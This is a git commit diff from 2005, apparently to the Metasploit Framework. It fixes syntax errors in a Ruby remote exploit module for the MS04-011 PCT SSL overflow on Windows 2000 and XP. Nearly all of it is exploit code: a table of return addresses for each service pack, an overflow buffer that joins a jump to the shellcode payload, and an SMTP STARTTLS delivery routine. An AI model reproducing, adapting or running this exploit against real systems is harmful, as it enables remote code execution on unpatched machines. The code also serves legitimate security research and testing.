Woops

git-svn-id: file:///home/svn/incoming/trunk@3128 4d416f70-5f16-0410-b530-b9f4589650da
2005-11-26 16:46:49 +00:00 · 2005-11-26 16:46:49 +00:00 · a990e20067
parent ab597b4172
commit a990e20067
1 changed files with 10 additions and 10 deletions
--- a/modules/exploits/windows/ssl/ms04_011_pct.rb
+++ b/modules/exploits/windows/ssl/ms04_011_pct.rb
@ -50,49 +50,49 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
 						'Windows 2000 SP4',
 						{
 							'Platform' => 'win',
-							'Ret'      => 0x67419ce8], # jmp [esp + 0x6c]
+							'Ret'      => 0x67419ce8, # jmp [esp + 0x6c]
 						},
 					],
 					[ 
 						'Windows 2000 SP3',
 						{
 							'Platform' => 'win',
-							'Ret'      => 0x67419e1d], # jmp [esp + 0x6c]
+							'Ret'      => 0x67419e1d, # jmp [esp + 0x6c]
 						},
 					],					
 					[ 
 						'Windows 2000 SP2',
 						{
 							'Platform' => 'win',
-							'Ret'      => 0x6741a426], # jmp [esp + 0x6c]
+							'Ret'      => 0x6741a426, # jmp [esp + 0x6c]
 						},
 					],
 					[ 
 						'Windows 2000 SP1',
 						{
 							'Platform' => 'win',
-							'Ret'      => 0x77e4f44d], # jmp [ebx + 0x14]
+							'Ret'      => 0x77e4f44d, # jmp [ebx + 0x14]
 						},
 					],
 					[ 
 						'Windows 2000 SP0',
 						{
 							'Platform' => 'win',
-							'Ret'      => 0x7658a6cb], # jmp [ebx + 0x0e]
+							'Ret'      => 0x7658a6cb, # jmp [ebx + 0x0e]
 						},
 					],
 					[ 
 						'Windows XP SP0',
 						{
 							'Platform' => 'win',
-							'Ret'      => 0x0ffb7de9], # jmp [esp + 0x6c]
+							'Ret'      => 0x0ffb7de9, # jmp [esp + 0x6c]
 						},
 					],
 					[ 
 						'Windows XP SP1',
 						{
 							'Platform' => 'win',
-							'Ret'      => 0x0ffb832f], # jmp [esp + 0x6c]
+							'Ret'      => 0x0ffb832f, # jmp [esp + 0x6c]
 						},
 					],																									
 				],
@ -121,8 +121,8 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
 		#   eb0f         =>  jmp short 11 to shellcode
 		
        buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+
-		      "\xeb\x0f" + 'XXXXXXXXXXX'+
-			  [target.ret ^ 0xffffffff)].pack('V')+
+		      "\xeb\x0f" + 'XXXXXXXXXXX' +
+			  [target.ret ^ 0xffffffff].pack('V')+
 			  payload.encoded
 	
 		# Connect to a SMTP service, call STARTTLS
@ -135,7 +135,7 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
 			sock.put("STARTTLS\r\n")
 			resp = sock.get_once
 			
-			if (not resp =~ /^220/)
+			if (resp and resp !~ /^220/)
 				print_status("Warning: this server may not support STARTTLS")
 			end